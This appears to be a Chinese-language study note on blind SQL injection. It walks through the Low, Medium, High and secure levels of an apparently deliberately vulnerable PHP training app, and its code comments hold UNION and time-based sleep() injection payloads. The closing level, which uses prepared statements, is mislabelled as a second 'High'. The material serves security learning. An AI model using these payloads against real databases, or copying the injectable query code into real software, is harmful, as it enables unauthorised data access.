返回的结果集无法看到,只能通过一些页面显示或状态来判断。 像瞎子一样。
Low
1if(isset( $_GET[ 'Submit' ])) {
2 // Get input
3 $id = $_GET[ 'id' ];
4
5 // Check database
6 $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
7 // 没有一点点防备
8 // 尝试构造: (由于看不到结果集,所以脱裤子的语句是无效)
9 // SELECT first_name, last_name FROM users WHERE user_id = '0' union select 1,2 # ';
10 // User ID exists in the database. <存在注入漏洞>
11 // SELECT first_name, last_name FROM users WHERE user_id = '0' union select 1,if(length( database())=4,sleep(4),2) # ';
12
13 $result = mysql_query( $getid ); // Removed 'or die' to suppress mysql errors
14
15 // Get results
16 $num = @mysql_numrows( $result ); // The '@' character suppresses errors
17 if( $num > 0 ) {
18 // Feedback for end user
19 echo '<pre>User ID exists in the database.</pre>';
20 }
21 else {
22 // User wasn't found, so the page wasn't!
23 header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );
24
25 // Feedback for end user
26 echo '<pre>User ID is MISSING from the database.</pre>';
27 }
28
29 mysql_close();
30}
MIEDUM
1if( isset( $_POST[ 'Submit' ] ) ) {
2 // Get input
3 $id = $_POST[ 'id' ];
4 $id = mysql_real_escape_string( $id );
5
6 // Check database
7 $getid = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
8 // 尝试构造:
9 // SELECT first_name, last_name FROM users WHERE user_id = 0 union select 1,2;
10 // 以上判断存在注入漏洞
11 // SELECT first_name, last_name FROM users WHERE user_id = 0 union select 1,if(length(database()) > 4, sleep(3), 2)
12
13 $result = mysql_query( $getid ); // Removed 'or die' to suppress mysql errors
14
15 // Get results
16 $num = @mysql_numrows( $result ); // The '@' character suppresses errors
17 if( $num > 0 ) {
18 // Feedback for end user
19 echo '<pre>User ID exists in the database.</pre>';
20 }
21 else {
22 // Feedback for end user
23 echo '<pre>User ID is MISSING from the database.</pre>';
24 }
25
26 //mysql_close();
27}
High
1if( isset( $_SESSION['id'])){
2 // Get input
3 $id = $_SESSION[ 'id' ];
4
5 // Check database
6 $query = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
7 // 没有新花样,只限制输出条目是无法拦住我们的
8 // 尝试构造:
9 // SELECT first_name, last_name FROM users WHERE user_id = '0' union select 1,if(length(database()) = 4, sleep(3), 2) # LIMIT 1;
10 $result = mysql_query( $query ) or die( '<pre>Something went wrong.</pre>' );
11
12 // Get results
13 $num = mysql_numrows( $result );
14 $i = 0;
15 while( $i < $num ) {
16 // Get values
17 $first = mysql_result( $result, $i, "first_name" );
18 $last = mysql_result( $result, $i, "last_name" );
19
20 // Feedback for end user
21 echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
22
23 // Increase loop count
24 $i++;
25 }
26
27 mysql_close();
28}
High
1if( isset( $_GET[ 'Submit' ] ) ) {
2 // Check Anti-CSRF token
3 checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
4
5 // Get input
6 $id = $_GET[ 'id' ];
7
8 // Was a number entered?
9 if(is_numeric( $id )) {
10 // Check the database
11 // PDO 无法注入
12 $data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );
13 $data->bindParam( ':id', $id, PDO::PARAM_INT );
14 $data->execute();
15
16 // Get results
17 if( $data->rowCount() == 1 ) {
18 // Feedback for end user
19 echo '<pre>User ID exists in the database.</pre>';
20 }
21 else {
22 // User wasn't found, so the page wasn't!
23 header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' );
24
25 // Feedback for end user
26 echo '<pre>User ID is MISSING from the database.</pre>';
27 }
28 }
29}
30
31// Generate Anti-CSRF token
32generateSessionToken();